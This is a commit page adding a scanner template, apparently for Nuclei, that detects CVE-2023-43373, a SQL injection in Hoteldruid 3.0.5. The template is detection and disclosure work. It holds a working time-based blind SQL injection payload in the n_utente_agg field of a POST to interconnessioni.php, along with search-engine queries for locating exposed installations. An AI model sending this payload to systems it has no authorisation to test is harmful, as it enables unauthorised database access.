Create CVE-2023-43373.yaml

patch-12
Ritik Chaddha 2024-10-22 13:52:37 +05:30 committed by GitHub
parent 2094f0985f
commit c4aa51c335
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 77 additions and 0 deletions

View File

@ -0,0 +1,77 @@
id: CVE-2023-43373
info:
name: Hoteldruid v3.0.5 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the n_utente_agg parameter at /hoteldruid/interconnessioni.php.
impact: |
Allows attackers to execute arbitrary SQL queries and potentially gain unauthorized access to the database.
remediation: |
Update Hoteldruid to a patched version or apply vendor-supplied fixes to mitigate the SQL Injection vulnerability.
reference:
- https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-n_utente_agg-parameter-948a6d724b5348f3867ee6d780f98f1a
- https://nvd.nist.gov/vuln/detail/CVE-2023-43373
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43373
cwe-id: CWE-89
epss-score: 0.00076
epss-percentile: 0.31944
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: digitaldruid
product: hoteldruid
fofa-query: title="hoteldruid"
shodan-query: title:"hoteldruid"
tags: cve,cve2023,hoteldruid,sqli
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "hoteldruid")'
internal: true
- raw:
- |
POST /interconnessioni.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"
2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_interconnessione"
SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_utente_agg"
SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="n_utente_agg"
1' AND (SELECT 3869 FROM (SELECT(SLEEP(7)))qSXB)-- QMbZ
------------YWJkMTQzNDcw--
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
condition: and